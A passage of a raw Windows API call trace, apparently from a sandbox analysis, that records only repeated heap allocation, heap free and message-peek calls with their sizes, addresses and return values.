Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e98 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0091.074] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0091.074] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.074] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.074] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.075] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.075] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa40 | out: hHeap=0x680000) returned 1 [0091.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa40 [0091.080] RtlAllocateHeap 